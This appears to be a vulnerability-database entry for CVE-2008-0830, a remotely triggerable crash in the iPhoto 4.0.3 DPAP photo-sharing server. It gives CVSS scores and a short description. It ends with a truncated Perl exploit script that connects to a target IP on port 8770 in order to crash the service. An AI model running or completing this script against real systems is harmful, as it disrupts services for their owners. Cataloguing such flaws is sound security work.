7.5
CVSSv2

CVE-2008-0830

Published: 19/02/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The Digital Photo Access Protocol (DPAP) server for iPhoto 4.0.3 allows remote malicious users to cause a denial of service (crash) via a malformed dpap: URI, a different vulnerability than CVE-2008-0043.

Vulnerable Product Search on Vulmon Subscribe to Product

apple iphoto 4.0.3

Exploits

#!/usr/bin/perl # crash the iPhoto DPAP (Digital Photo Access Protocol) Server on iPhoto 403 # technically the server exits cleanly but it does not restart use IO::Socket::INET; die "Usage $0 <target_ip>\n" unless ($ARGV[0]); $| = 1; if ($ARGV[1]) { $port = $ARGV[1]; } else { $port = 8770; } $socket=new IO::Socket::INET-&gt ...